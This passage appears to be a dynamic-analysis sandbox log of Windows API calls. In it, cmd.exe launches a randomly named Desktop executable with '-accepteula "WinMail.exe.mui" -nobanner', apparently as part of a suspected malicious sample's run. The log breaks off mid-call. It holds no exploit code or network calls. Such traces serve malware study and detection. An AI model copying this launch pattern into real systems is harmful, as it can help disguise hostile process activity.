AllocationBase=0xe40000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0284.285] GetConsoleOutputCP () returned 0x1b5 [0284.326] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0284.326] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0284.326] _get_osfhandle (_FileHandle=1) returned 0xc0 [0284.326] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0284.326] _get_osfhandle (_FileHandle=1) returned 0xc0 [0284.326] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0284.326] _get_osfhandle (_FileHandle=0) returned 0x38 [0284.326] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0284.770] GetEnvironmentStringsW () returned 0x1167f68* [0284.770] FreeEnvironmentStringsA (penv="=") returned 1 [0284.770] GetEnvironmentStringsW () returned 0x1167f68* [0284.770] FreeEnvironmentStringsA (penv="=") returned 1 [0284.770] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xe3ee64 | out: phkResult=0xe3ee64*=0x94) returned 0x0 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x0, lpData=0xe3ee70*=0xb8, lpcbData=0xe3ee6c*=0x1000) returned 0x2 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x4, lpData=0xe3ee70*=0x1, lpcbData=0xe3ee6c*=0x4) returned 0x0 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x0, lpData=0xe3ee70*=0x1, lpcbData=0xe3ee6c*=0x1000) returned 0x2 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x4, lpData=0xe3ee70*=0x0, lpcbData=0xe3ee6c*=0x4) returned 0x0 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x4, lpData=0xe3ee70*=0x40, lpcbData=0xe3ee6c*=0x4) returned 0x0 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x4, lpData=0xe3ee70*=0x40, lpcbData=0xe3ee6c*=0x4) returned 0x0 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x0, lpData=0xe3ee70*=0x40, lpcbData=0xe3ee6c*=0x1000) returned 0x2 [0284.771] RegCloseKey (hKey=0x94) returned 0x0 [0284.771] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xe3ee64 | out: phkResult=0xe3ee64*=0x94) returned 0x0 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x0, lpData=0xe3ee70*=0x40, lpcbData=0xe3ee6c*=0x1000) returned 0x2 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x4, lpData=0xe3ee70*=0x1, lpcbData=0xe3ee6c*=0x4) returned 0x0 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x0, lpData=0xe3ee70*=0x1, lpcbData=0xe3ee6c*=0x1000) returned 0x2 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x4, lpData=0xe3ee70*=0x0, lpcbData=0xe3ee6c*=0x4) returned 0x0 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x4, lpData=0xe3ee70*=0x9, lpcbData=0xe3ee6c*=0x4) returned 0x0 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x4, lpData=0xe3ee70*=0x9, lpcbData=0xe3ee6c*=0x4) returned 0x0 [0284.771] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xe3ee68, lpData=0xe3ee70, lpcbData=0xe3ee6c*=0x1000 | out: lpType=0xe3ee68*=0x0, lpData=0xe3ee70*=0x9, lpcbData=0xe3ee6c*=0x1000) returned 0x2 [0284.771] RegCloseKey (hKey=0x94) returned 0x0 [0284.771] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432a5 [0284.771] srand (_Seed=0x5bb432a5) [0284.771] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner" [0284.771] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner" [0284.771] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0284.772] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1167f70, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0284.772] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0284.772] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0284.772] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0284.772] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0284.772] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0284.772] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0284.772] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0284.772] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0284.772] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0284.772] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0284.772] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0284.772] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0284.772] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0284.772] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xe3fc3c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0284.772] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xe3fc3c, lpFilePart=0xe3fc34 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xe3fc34*="Desktop") returned 0x1d [0284.772] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0284.772] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xe3f9b8 | out: lpFindFileData=0xe3f9b8) returned 0x1168180 [0284.773] FindClose (in: hFindFile=0x1168180 | out: hFindFile=0x1168180) returned 1 [0284.773] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xe3f9b8 | out: lpFindFileData=0xe3f9b8) returned 0x1168180 [0284.773] FindClose (in: hFindFile=0x1168180 | out: hFindFile=0x1168180) returned 1 [0284.773] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0284.773] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xe3f9b8 | out: lpFindFileData=0xe3f9b8) returned 0x1168180 [0284.773] FindClose (in: hFindFile=0x1168180 | out: hFindFile=0x1168180) returned 1 [0284.773] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0284.773] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0284.773] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0284.773] GetEnvironmentStringsW () returned 0x116a0c8* [0284.773] FreeEnvironmentStringsA (penv="=") returned 1 [0284.773] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0284.774] GetConsoleOutputCP () returned 0x1b5 [0284.869] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0284.869] GetUserDefaultLCID () returned 0x409 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xe3fd6c, cchData=128 | out: lpLCData="0") returned 2 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xe3fd6c, cchData=128 | out: lpLCData="0") returned 2 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xe3fd6c, cchData=128 | out: lpLCData="1") returned 2 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0284.870] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0284.870] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0284.871] GetConsoleTitleW (in: lpConsoleTitle=0x1168d20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0284.897] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0284.897] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0284.897] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0284.897] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0284.898] _wcsicmp (_String1="vIDhS3md.exe", _String2=")") returned 77 [0284.898] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0284.898] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0284.898] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0284.898] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0284.898] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0284.898] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0284.899] GetConsoleTitleW (in: lpConsoleTitle=0xe3fa58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0284.900] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0284.900] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0284.901] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0284.902] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0284.902] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0284.902] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0284.902] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0284.902] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0284.902] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0284.903] SetErrorMode (uMode=0x0) returned 0x0 [0284.903] SetErrorMode (uMode=0x1) returned 0x0 [0284.903] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x116b0d8, lpFilePart=0xe3f564 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xe3f564*="Desktop") returned 0x1d [0284.903] SetErrorMode (uMode=0x0) returned 0x1 [0284.903] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0284.903] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0284.907] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0284.908] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0284.908] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0xe3f310, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xe3f310) returned 0x1169428 [0284.908] FindClose (in: hFindFile=0x1169428 | out: hFindFile=0x1169428) returned 1 [0284.908] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0284.908] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0284.908] GetConsoleTitleW (in: lpConsoleTitle=0xe3f7e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0284.910] InitializeProcThreadAttributeList (in: lpAttributeList=0xe3f710, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xe3f6f4 | out: lpAttributeList=0xe3f710, lpSize=0xe3f6f4) returned 1 [0284.910] UpdateProcThreadAttribute (in: lpAttributeList=0xe3f710, dwFlags=0x0, Attribute=0x60001, lpValue=0xe3f6fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xe3f710, lpPreviousValue=0x0) returned 1 [0284.910] GetStartupInfoW (in: lpStartupInfo=0xe3f748 | out: lpStartupInfo=0xe3f748*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x38, hStdOutput=0xc0, hStdError=0x40)) [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"Win", _MaxCount=0x7) returned -3 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0284.911] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0284.912] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0284.913] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, 